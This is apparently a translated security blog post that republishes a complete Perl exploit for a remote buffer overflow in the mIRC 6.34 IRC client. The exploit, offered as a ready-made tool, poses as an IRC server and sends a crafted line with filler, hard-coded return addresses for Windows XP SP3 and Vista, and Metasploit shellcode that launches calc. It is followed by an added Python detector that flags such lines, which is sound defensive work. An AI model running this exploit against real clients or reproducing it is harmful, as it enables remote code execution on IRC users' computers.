It has been a long time since I gave you anything vulnerability-related; this blog has almost turned into a software blog. The reason is that my (Yehuo's) skills are too weak: there are many vulnerabilities I cannot understand, and what I cannot understand I am too lazy to post, so that not too many people say I am showing off.
But I cannot post nothing at all. The articles I do post will certainly be shallower in technical depth, and may not even need much technique, for example a ready-made exploit tool, which is what this post is.
**mIRC 6.34 Remote Buffer Overflow Exploit** (mIRC 6.34 remote buffer-overflow exploit tool)
```perl
#!/usr/bin/perl
# mIRC 6.34 Remote Buffer Overflow Exploit
# Exploit by SkD (skdrat hotmail <.> com)
# ----------------------------------------
# A day's work of debugging and looking at mIRC.
# Tested on Windows XP SP3 English and Windows Vista SP0.
# Credits to securfrog for publishing the PoC.
# Author has no responsibility over the damage you do with this!
# Note: You might change the addresses for Vista ;)
# ----------------------------------------
use IO::Socket;

if(!($ARGV[1]))
{
    print "\n[x] mIRC 6.34 Remote Buffer Overflow Exploit\n";
    print "[x] Exploit by SkD (skdrat@ hotmail.com)\n";
    print "[x] Use: mirc_exp.pl <port> <target>   (target: 1 = Windows XP SP3, anything else = Windows Vista)\n";
    exit;
}

while(1) {
    # Listen on the given port and wait for the mIRC client to connect.
    my $sock = new IO::Socket::INET ( Listen    => 1,
                                      LocalAddr => '127.0.0.1',
                                      LocalPort => $ARGV[0],
                                      Proto     => 'tcp');
    die unless $sock;

    # win32_exec - EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com
    my $shellcode =
        "\x2b\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x1e".
        "\x95\x97\xf1\x83\xeb\xfc\xe2\xf4\xe2\x7d\xd3\xf1\x1e\x95\x1c\xb4".
        "\x22\x1e\xeb\xf4\x66\x94\x78\x7a\x51\x8d\x1c\xae\x3e\x94\x7c\xb8".
        "\x95\xa1\x1c\xf0\xf0\xa4\x57\x68\xb2\x11\x57\x85\x19\x54\x5d\xfc".
        "\x1f\x57\x7c\x05\x25\xc1\xb3\xf5\x6b\x70\x1c\xae\x3a\x94\x7c\x97".
        "\x95\x99\xdc\x7a\x41\x89\x96\x1a\x95\x89\x1c\xf0\xf5\x1c\xcb\xd5".
        "\x1a\x56\xa6\x31\x7a\x1e\xd7\xc1\x9b\x55\xef\xfd\x95\xd5\x9b\x7a".
        "\x6e\x89\x3a\x7a\x76\x9d\x7c\xf8\x95\x15\x27\xf1\x1e\x95\x1c\x99".
        "\x22\xca\xa6\x07\x7e\xc3\x1e\x09\x9d\x55\xec\xa1\x76\x65\x1d\xf5".
        "\x41\xfd\x0f\x0f\x94\x9b\xc0\x0e\xf9\xf6\xf6\x9d\x7d\x95\x97\xf1";

    print "[x] Listening on port ".$ARGV[0]."..\n";
    $s = $sock->accept();
    print "[x] Got a user!\n";

    $overflow   = "\x41" x 307;
    $overflow2  = "B" x 12;
    $eip_vista  = "\x66\x1c\xc2\x76";   # Normaliz.DLL pop pop ret
    $eip2_vista = "\xd3\xdb\x54\x77";   # MSFCT.DLL jmp esp
    $eip_xpsp3  = "\xd1\xfb\x92\x77";   # SETUPAPI.DLL 0x7792FBD1 pop eax pop ret
    $eip2_xpsp3 = "\xb7\x87\x9d\x77";   # SETUPAPI.DLL 0x779D87B7 jmp esp
    $addr       = "\xb5\xb5\xfd\x7f";
    $nop_sled   = "\x90" x 4;
    $jmp        = "\xEB\x03\xFF\xFF";

    print "[x] Sending packets..\n";
    print $s "\n.com 001 wow to the Internet Relay Network wow\n";
    sleep(1);
    if($ARGV[1] == "1") {
        print $s ":".$overflow.$eip_xpsp3.$addr.$nop_sled.$eip2_xpsp3.$nop_sled.$overflow2.$jmp.$nop_sled.$shellcode.$nop_sled." PRIVMSG wow : /FINGER wow.\n";
    } else {
        print $s ":".$overflow.$eip_vista.$addr.$nop_sled.$eip2_vista.$nop_sled.$overflow2.$jmp.$nop_sled.$shellcode.$nop_sled." PRIVMSG wow : /FINGER wow.\n";
    }
    print "[x] Check it out!\n";
}
```
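The malicious server line above stands out from ordinary IRC traffic in two ways: a filler run of 307 identical bytes, and a block of non-text bytes in the middle of a PRIVMSG. As an added example (not part of the original post or of the exploit author's script), the Python below checks raw server-to-client lines for exactly those traits, which is the kind of check an IRC proxy or IDS rule would apply. The thresholds and the two sample lines are assumptions constructed for this example.

```python
import re

# RFC 1459 caps one IRC message at 512 bytes including the trailing CRLF.
MAX_IRC_LINE = 512
# Longest tolerated run of one repeated byte (assumed value for this example;
# the exploit's filler is 307 x 'A', far beyond typical chat text).
MAX_RUN = 64
# Control bytes that legitimately occur in IRC text: tab, the CTCP delimiter
# (0x01) and mIRC formatting codes (bold, colour, reset, reverse, italic, underline).
ALLOWED_CONTROL = {0x09, 0x01, 0x02, 0x03, 0x0f, 0x16, 0x1d, 0x1f}


def _looks_binary(line: bytes) -> bool:
    """True if the line is not valid UTF-8 or carries unexpected control bytes."""
    try:
        line.decode("utf-8")
    except UnicodeDecodeError:
        return True
    return any(b < 0x20 and b not in ALLOWED_CONTROL for b in line)


def inspect_irc_line(line: bytes) -> list:
    """Return findings for one raw server->client IRC line (CRLF already stripped)."""
    findings = []
    if len(line) > MAX_IRC_LINE:
        findings.append("oversize")
    # Longest run of a single repeated byte; re.S lets '.' match any byte value.
    longest = max((len(m.group(0)) for m in re.finditer(rb"(.)\1*", line, re.S)), default=0)
    if longest > MAX_RUN:
        findings.append("long-run")
    if _looks_binary(line):
        findings.append("binary")
    return findings


def scan(lines) -> list:
    """Return (index, findings) for every line that raised at least one finding."""
    return [(i, f) for i, l in enumerate(lines) if (f := inspect_irc_line(l))]


# Constructed sample traffic: a normal 001 welcome, and a line shaped like the
# exploit's (long filler, then non-text bytes, then a PRIVMSG tail).
BENIGN_LINE = b":irc.example.net 001 wow :Welcome to the Internet Relay Network wow"
SUSPECT_LINE = (b":" + b"A" * 307 + b"\xeb\x03\xff\xff" + b"\x90" * 4
                + b"\xcc" * 16 + b" PRIVMSG wow :/FINGER wow")

if __name__ == "__main__":
    for idx, findings in scan([BENIGN_LINE, SUSPECT_LINE]):
        print(f"line {idx}: {', '.join(findings)}")
```

Note that the suspect line stays under the 512-byte limit, so a length check alone would not catch it; the repeated-byte and binary-content checks are what flag it.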